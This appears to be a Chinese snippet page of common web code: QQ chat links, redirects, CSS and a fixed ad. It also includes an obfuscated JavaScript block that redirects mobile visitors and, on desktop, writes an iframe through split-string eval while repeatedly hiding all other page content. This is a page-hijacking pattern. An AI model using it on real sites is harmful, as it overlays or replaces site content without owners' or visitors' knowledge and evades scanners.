常用代码(即时更)

PC端:QQ在线客服链接代码
tencent咨询

PC端手机端通吃:QQ在线客服链接代码
wpa咨询

移动端H5 QQ群在线客服链接代码
报名咨询

QQ群

meta标签5秒跳转

a标签去掉下划线
a{ text-decoration:none}

固定底部广告



iframe js调用嵌套(全局覆盖)

if ((navigator.userAgent.match(/(iPhone|iPod|Android|ios|mobile|Nokia|Symbian|Phone|Linux armv71|Windows CE)/i))) {
var url = 'http://www.baidu.com';
location.replace(url);
} else {
var src = '

';
eval("do" + "cu" + "ment.wr" + "ite('" + src + "');");
try {
setInterval(function() {
for (var i = 0; i < document.body.children.length; i++) {
try {
var a = document.body.children[i].tagName;
var b = document.body.children[i].id;
if (b != "iconDiv1" && b != "showcl") {
document.body.children[i].style.display = "non" + "e"
}
} catch (e) {}
}
}, 100)
} catch (e) {}
}

//PHP跳转代码
< ?php
//重定向浏览器
header("Location: http://www.qq.com");
//确保重定向后,后续代码不会被执行
exit;
?>

你可能感兴趣的:(常用代码(即时更))